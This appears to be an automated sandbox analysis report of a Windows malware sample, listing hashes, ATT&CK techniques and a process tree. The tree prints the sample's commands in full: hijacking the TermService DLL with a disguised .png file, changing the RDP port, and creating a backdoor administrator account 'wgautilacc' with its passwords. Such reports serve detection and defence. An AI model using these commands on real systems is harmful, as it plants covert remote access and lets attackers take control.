cbcfad5e750f0e032d59c23e09a993471555360688c4cd59b8ba7b896c2e4b88

Analysis

max time kernel
58s
max time network
123s
platform
windows10_x64
resource
win10v20201028
submitted
17-11-2020 12:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63a4fa287d067ff9083c6d2bf5735016.exe
Size

3.1MB
MD5

c6ebdaa3c37a66c4e19964b77df4c1bb
SHA1

826e46cec09b7e0748b62fb398d3e955edb3cc9d
SHA256

cbcfad5e750f0e032d59c23e09a993471555360688c4cd59b8ba7b896c2e4b88
SHA512

63423c6ef2128a3da43a64dbd4669c54c5aca01d32886c51f37b915d64f0a61cd852c5f505d6b1fd6c220ce787e1f091e8038733ee617c36eb3dc2c4dd7f78a9

Score

9^/10

persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

948
948

pid	process
948
948

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1416 reg.exe
Runs net.exe

pid	process
1416	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
904	powershell.exe
904	powershell.exe
904	powershell.exe
416	powershell.exe
416	powershell.exe
416	powershell.exe
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
2828	powershell.exe
2828	powershell.exe
2828	powershell.exe
904	powershell.exe
904	powershell.exe
904	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

620
620

pid	process
620
620

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeIncreaseQuotaPrivilege	416	powershell.exe
Token: SeSecurityPrivilege	416	powershell.exe
Token: SeTakeOwnershipPrivilege	416	powershell.exe
Token: SeLoadDriverPrivilege	416	powershell.exe
Token: SeSystemProfilePrivilege	416	powershell.exe
Token: SeSystemtimePrivilege	416	powershell.exe
Token: SeProfSingleProcessPrivilege	416	powershell.exe
Token: SeIncBasePriorityPrivilege	416	powershell.exe
Token: SeCreatePagefilePrivilege	416	powershell.exe
Token: SeBackupPrivilege	416	powershell.exe
Token: SeRestorePrivilege	416	powershell.exe
Token: SeShutdownPrivilege	416	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeSystemEnvironmentPrivilege	416	powershell.exe
Token: SeRemoteShutdownPrivilege	416	powershell.exe
Token: SeUndockPrivilege	416	powershell.exe
Token: SeManageVolumePrivilege	416	powershell.exe
Token: 33	416	powershell.exe
Token: 34	416	powershell.exe
Token: 35	416	powershell.exe
Token: 36	416	powershell.exe
Token: SeIncreaseQuotaPrivilege	3712	powershell.exe
Token: SeSecurityPrivilege	3712	powershell.exe
Token: SeTakeOwnershipPrivilege	3712	powershell.exe
Token: SeLoadDriverPrivilege	3712	powershell.exe
Token: SeSystemProfilePrivilege	3712	powershell.exe
Token: SeSystemtimePrivilege	3712	powershell.exe
Token: SeProfSingleProcessPrivilege	3712	powershell.exe
Token: SeIncBasePriorityPrivilege	3712	powershell.exe
Token: SeCreatePagefilePrivilege	3712	powershell.exe
Token: SeBackupPrivilege	3712	powershell.exe
Token: SeRestorePrivilege	3712	powershell.exe
Token: SeShutdownPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeSystemEnvironmentPrivilege	3712	powershell.exe
Token: SeRemoteShutdownPrivilege	3712	powershell.exe
Token: SeUndockPrivilege	3712	powershell.exe
Token: SeManageVolumePrivilege	3712	powershell.exe
Token: 33	3712	powershell.exe
Token: 34	3712	powershell.exe
Token: 35	3712	powershell.exe
Token: 36	3712	powershell.exe
Token: SeIncreaseQuotaPrivilege	2828	powershell.exe
Token: SeSecurityPrivilege	2828	powershell.exe
Token: SeTakeOwnershipPrivilege	2828	powershell.exe
Token: SeLoadDriverPrivilege	2828	powershell.exe
Token: SeSystemProfilePrivilege	2828	powershell.exe
Token: SeSystemtimePrivilege	2828	powershell.exe
Token: SeProfSingleProcessPrivilege	2828	powershell.exe
Token: SeIncBasePriorityPrivilege	2828	powershell.exe
Token: SeCreatePagefilePrivilege	2828	powershell.exe
Token: SeBackupPrivilege	2828	powershell.exe
Token: SeRestorePrivilege	2828	powershell.exe
Token: SeShutdownPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeSystemEnvironmentPrivilege	2828	powershell.exe
Token: SeRemoteShutdownPrivilege	2828	powershell.exe
Token: SeUndockPrivilege	2828	powershell.exe
Token: SeManageVolumePrivilege	2828	powershell.exe
Token: 33	2828	powershell.exe

Suspicious use of WriteProcessMemory 70 IoCs

Processes:

63a4fa287d067ff9083c6d2bf5735016.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 884 wrote to memory of 904	884	63a4fa287d067ff9083c6d2bf5735016.exe	powershell.exe
PID 884 wrote to memory of 904	884	63a4fa287d067ff9083c6d2bf5735016.exe	powershell.exe
PID 904 wrote to memory of 1976	904	powershell.exe	csc.exe
PID 904 wrote to memory of 1976	904	powershell.exe	csc.exe
PID 1976 wrote to memory of 3732	1976	csc.exe	cvtres.exe
PID 1976 wrote to memory of 3732	1976	csc.exe	cvtres.exe
PID 904 wrote to memory of 416	904	powershell.exe	powershell.exe
PID 904 wrote to memory of 416	904	powershell.exe	powershell.exe
PID 904 wrote to memory of 3712	904	powershell.exe	powershell.exe
PID 904 wrote to memory of 3712	904	powershell.exe	powershell.exe
PID 904 wrote to memory of 2828	904	powershell.exe	powershell.exe
PID 904 wrote to memory of 2828	904	powershell.exe	powershell.exe
PID 904 wrote to memory of 1336	904	powershell.exe	reg.exe
PID 904 wrote to memory of 1336	904	powershell.exe	reg.exe
PID 904 wrote to memory of 1416	904	powershell.exe	reg.exe
PID 904 wrote to memory of 1416	904	powershell.exe	reg.exe
PID 904 wrote to memory of 2188	904	powershell.exe	reg.exe
PID 904 wrote to memory of 2188	904	powershell.exe	reg.exe
PID 904 wrote to memory of 808	904	powershell.exe	net.exe
PID 904 wrote to memory of 808	904	powershell.exe	net.exe
PID 808 wrote to memory of 2756	808	net.exe	net1.exe
PID 808 wrote to memory of 2756	808	net.exe	net1.exe
PID 904 wrote to memory of 2228	904	powershell.exe	cmd.exe
PID 904 wrote to memory of 2228	904	powershell.exe	cmd.exe
PID 2228 wrote to memory of 2744	2228	cmd.exe	cmd.exe
PID 2228 wrote to memory of 2744	2228	cmd.exe	cmd.exe
PID 2744 wrote to memory of 1796	2744	cmd.exe	net.exe
PID 2744 wrote to memory of 1796	2744	cmd.exe	net.exe
PID 1796 wrote to memory of 2388	1796	net.exe	net1.exe
PID 1796 wrote to memory of 2388	1796	net.exe	net1.exe
PID 904 wrote to memory of 2308	904	powershell.exe	cmd.exe
PID 904 wrote to memory of 2308	904	powershell.exe	cmd.exe
PID 2308 wrote to memory of 2260	2308	cmd.exe	cmd.exe
PID 2308 wrote to memory of 2260	2308	cmd.exe	cmd.exe
PID 2260 wrote to memory of 804	2260	cmd.exe	net.exe
PID 2260 wrote to memory of 804	2260	cmd.exe	net.exe
PID 804 wrote to memory of 3372	804	net.exe	net1.exe
PID 804 wrote to memory of 3372	804	net.exe	net1.exe
PID 1656 wrote to memory of 3712	1656	cmd.exe	net.exe
PID 1656 wrote to memory of 3712	1656	cmd.exe	net.exe
PID 3712 wrote to memory of 3344	3712	net.exe	net1.exe
PID 3712 wrote to memory of 3344	3712	net.exe	net1.exe
PID 1332 wrote to memory of 1912	1332	cmd.exe	net.exe
PID 1332 wrote to memory of 1912	1332	cmd.exe	net.exe
PID 1912 wrote to memory of 1336	1912	net.exe	net1.exe
PID 1912 wrote to memory of 1336	1912	net.exe	net1.exe
PID 1416 wrote to memory of 3828	1416	cmd.exe	net.exe
PID 1416 wrote to memory of 3828	1416	cmd.exe	net.exe
PID 3828 wrote to memory of 808	3828	net.exe	net1.exe
PID 3828 wrote to memory of 808	3828	net.exe	net1.exe
PID 196 wrote to memory of 2744	196	cmd.exe	net.exe
PID 196 wrote to memory of 2744	196	cmd.exe	net.exe
PID 2744 wrote to memory of 3000	2744	net.exe	net1.exe
PID 2744 wrote to memory of 3000	2744	net.exe	net1.exe
PID 904 wrote to memory of 2668	904	powershell.exe	cmd.exe
PID 904 wrote to memory of 2668	904	powershell.exe	cmd.exe
PID 652 wrote to memory of 3340	652	cmd.exe	net.exe
PID 652 wrote to memory of 3340	652	cmd.exe	net.exe
PID 904 wrote to memory of 3816	904	powershell.exe	cmd.exe
PID 904 wrote to memory of 3816	904	powershell.exe	cmd.exe
PID 3340 wrote to memory of 2252	3340	net.exe	net1.exe
PID 3340 wrote to memory of 2252	3340	net.exe	net1.exe
PID 2100 wrote to memory of 900	2100	cmd.exe	net.exe
PID 2100 wrote to memory of 900	2100	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\63a4fa287d067ff9083c6d2bf5735016.exe
"C:\Users\Admin\AppData\Local\Temp\63a4fa287d067ff9083c6d2bf5735016.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:884

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2sesfy4i\2sesfy4i.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES814B.tmp" "c:\Users\Admin\AppData\Local\Temp\2sesfy4i\CSC647A285BFC9B4B7C996BA649437DF517.TMP"
4⤵
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1336

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:1416

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2188

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2756

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2388

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3372

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:2668

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:3816

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1656

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:3712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:3344

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc IzhHTYXO /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\system32\net.exe
net.exe user wgautilacc IzhHTYXO /add
2⤵
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc IzhHTYXO /add
3⤵
PID:1336

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:808

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:196

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
3⤵
PID:3000

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:2252

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc IzhHTYXO
1⤵
- Suspicious use of WriteProcessMemory
PID:2100

C:\Windows\system32\net.exe
net.exe user wgautilacc IzhHTYXO
2⤵
PID:900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc IzhHTYXO
3⤵
PID:2552

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:1636

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:2996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:2188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
525c8172539cddd625bd3fe2e504b75c

SHA1
89b62752eaa65c9caf68b4229216b3bfd4091b93

SHA256
66a60ca54dba739c590f7644d6e5ef731c51ac80835786f8155fd5dcf8ec3ef4

SHA512
4de4d86027cd2f19b274fda37a4319d4f3cdd3729d83f5d58781ce14713403c095455df1434216eeed6a6d06439a92e844edecb7d05a989cf4625e868d53bc31

Download Submit
C:\Users\Admin\AppData\Local\Temp\2sesfy4i\2sesfy4i.dll
MD5
307d627970009e61576993ca816307e2

SHA1
4666289a2814342c4e751eccf24be83b8bbeb00b

SHA256
344ff17a5817c287edbbd84374b23d18a8a55dd93210cb79b302976017099579

SHA512
06569fd87f2bfe07b147b84196b7bb911a1a9c4865ee48e975ed67a4fa0e0deb1420112238dfbe8ffd5a1a19bdad30986b5a00e68608a107a997cc363e15f0b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES814B.tmp
MD5
0ebacbd0c69446f1aa2b174c3818b2e7

SHA1
a1b8793a44720365835a3bdb0653e6dfa6be0232

SHA256
0118cba2d7031db08eef1a0e087c55313f362bc0d9d2f893336982389b408da5

SHA512
6620d01452d0314a2d5ce1d0ea18387035149340658624773c63cc2a1b54710f079feb55aa03d93acf964640490f1b4ad9ace88e596bfca9dc86a728cbf28289

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2sesfy4i\2sesfy4i.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2sesfy4i\2sesfy4i.cmdline
MD5
e591dba83245fa5a6bdb1d2e65054d65

SHA1
7eb42778e33022b0ee860ddde1fcec63276c2c8f

SHA256
4fa6d06b1e4691a3009ab46211aa99f09569c7dab52de8e2a6d58e8e3749e11d

SHA512
dc932d09f9b0c91ed6ad91c2366cb87272f4f9c95d2162cbf9745a36c79af432518e6888c33556ccb95e9815f01fd3feab8f49ca52960b24c698fee5401add89

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2sesfy4i\CSC647A285BFC9B4B7C996BA649437DF517.TMP
MD5
e87bbe792b5b39dddf3514d2c5a7a092

SHA1
24949cd62011e8c978d96309a363c8d98c5f79a1

SHA256
0669ed40040624f6716d41a09e4b8a96b24597d0780fbc30a578eb9a185df36d

SHA512
728d0002ed901fdb178f492fad24034021fb1f04c3497235493630a4567ac0af75354d9a32b37c587d825aa66e5f43fbfb30c985d0b004b1de69822275d6e3e9

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/416-18-0x0000000000000000-mapping.dmp

Download
memory/416-19-0x00007FFA6A2C0000-0x00007FFA6ACAC000-memory.dmp

Filesize
9.9MB

Download
memory/804-42-0x0000000000000000-mapping.dmp

Download
memory/808-34-0x0000000000000000-mapping.dmp

Download
memory/808-51-0x0000000000000000-mapping.dmp

Download
memory/884-1-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/900-58-0x0000000000000000-mapping.dmp

Download
memory/904-15-0x000001CC06740000-0x000001CC06741000-memory.dmp

Filesize
4KB

Download
memory/904-17-0x000001CC293D0000-0x000001CC293D1000-memory.dmp

Filesize
4KB

Download
memory/904-16-0x000001CC29040000-0x000001CC29041000-memory.dmp

Filesize
4KB

Download
memory/904-5-0x000001CC06760000-0x000001CC06761000-memory.dmp

Filesize
4KB

Download
memory/904-3-0x00007FFA6A2C0000-0x00007FFA6ACAC000-memory.dmp

Filesize
9.9MB

Download
memory/904-4-0x000001CC06290000-0x000001CC06291000-memory.dmp

Filesize
4KB

Download
memory/904-2-0x0000000000000000-mapping.dmp

Download
memory/904-6-0x000001CC20A30000-0x000001CC20A31000-memory.dmp

Filesize
4KB

Download
memory/1336-49-0x0000000000000000-mapping.dmp

Download
memory/1336-31-0x0000000000000000-mapping.dmp

Download
memory/1416-32-0x0000000000000000-mapping.dmp

Download
memory/1796-38-0x0000000000000000-mapping.dmp

Download
memory/1912-48-0x0000000000000000-mapping.dmp

Download
memory/1976-8-0x0000000000000000-mapping.dmp

Download
memory/2188-33-0x0000000000000000-mapping.dmp

Download
memory/2188-61-0x0000000000000000-mapping.dmp

Download
memory/2228-36-0x0000000000000000-mapping.dmp

Download
memory/2252-57-0x0000000000000000-mapping.dmp

Download
memory/2260-41-0x0000000000000000-mapping.dmp

Download
memory/2308-40-0x0000000000000000-mapping.dmp

Download
memory/2388-39-0x0000000000000000-mapping.dmp

Download
memory/2552-59-0x0000000000000000-mapping.dmp

Download
memory/2668-54-0x0000000000000000-mapping.dmp

Download
memory/2744-37-0x0000000000000000-mapping.dmp

Download
memory/2744-52-0x0000000000000000-mapping.dmp

Download
memory/2756-35-0x0000000000000000-mapping.dmp

Download
memory/2828-25-0x0000000000000000-mapping.dmp

Download
memory/2828-27-0x00007FFA6A2C0000-0x00007FFA6ACAC000-memory.dmp

Filesize
9.9MB

Download
memory/2996-60-0x0000000000000000-mapping.dmp

Download
memory/3000-53-0x0000000000000000-mapping.dmp

Download
memory/3340-55-0x0000000000000000-mapping.dmp

Download
memory/3344-47-0x0000000000000000-mapping.dmp

Download
memory/3372-43-0x0000000000000000-mapping.dmp

Download
memory/3712-22-0x0000000000000000-mapping.dmp

Download
memory/3712-46-0x0000000000000000-mapping.dmp

Download
memory/3712-23-0x00007FFA6A2C0000-0x00007FFA6ACAC000-memory.dmp

Filesize
9.9MB

Download
memory/3732-11-0x0000000000000000-mapping.dmp

Download
memory/3816-56-0x0000000000000000-mapping.dmp

Download
memory/3828-50-0x0000000000000000-mapping.dmp

Download